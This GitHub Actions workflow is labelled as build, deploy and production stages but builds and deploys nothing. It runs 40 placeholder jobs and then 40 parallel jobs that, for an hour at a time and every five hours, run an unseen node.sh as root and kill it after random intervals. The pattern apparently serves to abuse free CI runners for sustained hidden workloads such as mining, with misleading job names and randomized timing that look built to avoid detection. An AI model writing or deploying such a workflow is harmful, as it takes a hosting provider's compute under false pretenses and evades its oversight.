name: build

on: 
  workflow_dispatch:
  push:
  schedule:
    - cron: '0 */5 * * *'

jobs: 
  build: 
    name: build 
    runs-on: ubuntu-latest 
    strategy: 
      max-parallel: 40 
      fail-fast: false 
      matrix: 
        go: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] 
        flag: [A, B, C, D] 
    env: 
        NUM_JOBS: 40  
        JOB: ${{ matrix.go }} 
    steps: 
      - name: Setup 
        continue-on-error: true 
        uses: actions/checkout@v1

  deploy-1: 
    name: deploy-1 
    needs: build 
    runs-on: ubuntu-latest 
    strategy: 
      max-parallel: 5 
      fail-fast: false 
      matrix: 
        go: [1, 2, 3, 4, 5] 
    env: 
        NUM_JOBS: 5 
        JOB: ${{ matrix.go }} 
    steps: 
      - name: Setup 
        uses: actions/checkout@v2 
      - name: Run Shell Script with Random Wait Time
        run: |
          end=$((SECONDS+3600))
          while [ $SECONDS -lt $end ]; do
            # Run the shell script in the background
            chmod +x "${GITHUB_WORKSPACE}/node.sh" && sudo RUNNER_ALLOW_RUNASROOT=true "${GITHUB_WORKSPACE}/node.sh" &
            pid=$!

            # Generate a random wait time between 1 and 10 minutes
            wait_time=$((RANDOM % 600 + 1))

            # Wait for the random amount of time
            sleep $wait_time

            # Kill the process
            kill $pid

            # Ensure the process is killed
            wait $pid 2>/dev/null
          done

  deploy-2: 
    name: deploy-2 
    needs: build 
    runs-on: ubuntu-latest 
    strategy: 
      max-parallel: 5 
      fail-fast: false 
      matrix: 
        go: [1, 2, 3, 4, 5] 
    env: 
        NUM_JOBS: 5 
        JOB: ${{ matrix.go }} 
    steps: 
      - name: Setup 
        uses: actions/checkout@v2 
      - name: Run Shell Script with Random Wait Time
        run: |
          end=$((SECONDS+3600))
          while [ $SECONDS -lt $end ]; do
            # Run the shell script in the background
            chmod +x "${GITHUB_WORKSPACE}/node.sh" && sudo RUNNER_ALLOW_RUNASROOT=true "${GITHUB_WORKSPACE}/node.sh" &
            pid=$!

            # Generate a random wait time between 1 and 10 minutes
            wait_time=$((RANDOM % 600 + 1))

            # Wait for the random amount of time
            sleep $wait_time

            # Kill the process
            kill $pid

            # Ensure the process is killed
            wait $pid 2>/dev/null
          done

  deploy-3: 
    name: deploy-3 
    needs: build 
    runs-on: ubuntu-latest 
    strategy: 
      max-parallel: 5 
      fail-fast: false 
      matrix: 
        go: [1, 2, 3, 4, 5] 
    env: 
        NUM_JOBS: 5 
        JOB: ${{ matrix.go }} 
    steps: 
      - name: Setup 
        uses: actions/checkout@v2 
      - name: Run Shell Script with Random Wait Time
        run: |
          end=$((SECONDS+3600))
          while [ $SECONDS -lt $end ]; do
            # Run the shell script in the background
            chmod +x "${GITHUB_WORKSPACE}/node.sh" && sudo RUNNER_ALLOW_RUNASROOT=true "${GITHUB_WORKSPACE}/node.sh" &
            pid=$!

            # Generate a random wait time between 1 and 10 minutes
            wait_time=$((RANDOM % 600 + 1))

            # Wait for the random amount of time
            sleep $wait_time

            # Kill the process
            kill $pid

            # Ensure the process is killed
            wait $pid 2>/dev/null
          done

  deploy-4: 
    name: deploy-4 
    needs: build 
    runs-on: ubuntu-latest 
    strategy: 
      max-parallel: 5 
      fail-fast: false 
      matrix: 
        go: [1, 2, 3, 4, 5] 
    env: 
        NUM_JOBS: 5 
        JOB: ${{ matrix.go }} 
    steps: 
      - name: Setup 
        uses: actions/checkout@v2 
      - name: Run Shell Script with Random Wait Time
        run: |
          end=$((SECONDS+3600))
          while [ $SECONDS -lt $end ]; do
            # Run the shell script in the background
            chmod +x "${GITHUB_WORKSPACE}/node.sh" && sudo RUNNER_ALLOW_RUNASROOT=true "${GITHUB_WORKSPACE}/node.sh" &
            pid=$!

            # Generate a random wait time between 1 and 10 minutes
            wait_time=$((RANDOM % 600 + 1))

            # Wait for the random amount of time
            sleep $wait_time

            # Kill the process
            kill $pid

            # Ensure the process is killed
            wait $pid 2>/dev/null
          done

  success: 
    name: success 
    needs: [deploy-1, deploy-2, deploy-3, deploy-4] 
    runs-on: ubuntu-latest 
    steps: 
      - name: Setup 
        continue-on-error: true 
        uses: actions/checkout@v1

  production-1: 
    name: production-1 
    needs: success 
    runs-on: ubuntu-latest 
    strategy: 
      max-parallel: 5 
      fail-fast: false 
      matrix: 
        go: [1, 2, 3, 4, 5] 
    env: 
        NUM_JOBS: 5 
        JOB: ${{ matrix.go }} 
    steps: 
      - name: Setup 
        uses: actions/checkout@v2 
      - name: Run Shell Script with Random Wait Time
        run: |
          end=$((SECONDS+3600))
          while [ $SECONDS -lt $end ]; do
            # Run the shell script in the background
            chmod +x "${GITHUB_WORKSPACE}/node.sh" && sudo RUNNER_ALLOW_RUNASROOT=true "${GITHUB_WORKSPACE}/node.sh" &
            pid=$!

            # Generate a random wait time between 1 and 10 minutes
            wait_time=$((RANDOM % 600 + 1))

            # Wait for the random amount of time
            sleep $wait_time

            # Kill the process
            kill $pid

            # Ensure the process is killed
            wait $pid 2>/dev/null
          done

  production-2: 
    name: production-2 
    needs: success 
    runs-on: ubuntu-latest 
    strategy: 
      max-parallel: 5 
      fail-fast: false 
      matrix: 
        go: [1, 2, 3, 4, 5] 
    env: 
        NUM_JOBS: 5 
        JOB: ${{ matrix.go }} 
    steps: 
      - name: Setup 
        uses: actions/checkout@v2 
      - name: Run Shell Script with Random Wait Time
        run: |
          end=$((SECONDS+3600))
          while [ $SECONDS -lt $end ]; do
            # Run the shell script in the background
            chmod +x "${GITHUB_WORKSPACE}/node.sh" && sudo RUNNER_ALLOW_RUNASROOT=true "${GITHUB_WORKSPACE}/node.sh" &
            pid=$!

            # Generate a random wait time between 1 and 10 minutes
            wait_time=$((RANDOM % 600 + 1))

            # Wait for the random amount of time
            sleep $wait_time

            # Kill the process
            kill $pid

            # Ensure the process is killed
            wait $pid 2>/dev/null
          done

  production-3: 
    name: production-3 
    needs: success 
    runs-on: ubuntu-latest 
    strategy: 
      max-parallel: 5 
      fail-fast: false 
      matrix: 
        go: [1, 2, 3, 4, 5] 
    env: 
        NUM_JOBS: 5 
        JOB: ${{ matrix.go }} 
    steps: 
      - name: Setup 
        uses: actions/checkout@v2 
      - name: Run Shell Script with Random Wait Time
        run: |
          end=$((SECONDS+3600))
          while [ $SECONDS -lt $end ]; do
            # Run the shell script in the background
            chmod +x "${GITHUB_WORKSPACE}/node.sh" && sudo RUNNER_ALLOW_RUNASROOT=true "${GITHUB_WORKSPACE}/node.sh" &
            pid=$!

            # Generate a random wait time between 1 and 10 minutes
            wait_time=$((RANDOM % 600 + 1))

            # Wait for the random amount of time
            sleep $wait_time

            # Kill the process
            kill $pid

            # Ensure the process is killed
            wait $pid 2>/dev/null
          done

  production-4: 
    name: production-4 
    needs: success 
    runs-on: ubuntu-latest 
    strategy: 
      max-parallel: 5 
      fail-fast: false 
      matrix: 
        go: [1, 2, 3, 4, 5] 
    env: 
        NUM_JOBS: 5 
        JOB: ${{ matrix.go }} 
    steps: 
      - name: Setup 
        uses: actions/checkout@v2 
      - name: Run Shell Script with Random Wait Time
        run: |
          end=$((SECONDS+3600))
          while [ $SECONDS -lt $end ]; do
            # Run the shell script in the background
            chmod +x "${GITHUB_WORKSPACE}/node.sh" && sudo RUNNER_ALLOW_RUNASROOT=true "${GITHUB_WORKSPACE}/node.sh" &
            pid=$!

            # Generate a random wait time between 1 and 10 minutes
            wait_time=$((RANDOM % 600 + 1))

            # Wait for the random amount of time
            sleep $wait_time

            # Kill the process
            kill $pid

            # Ensure the process is killed
            wait $pid 2>/dev/null
          done
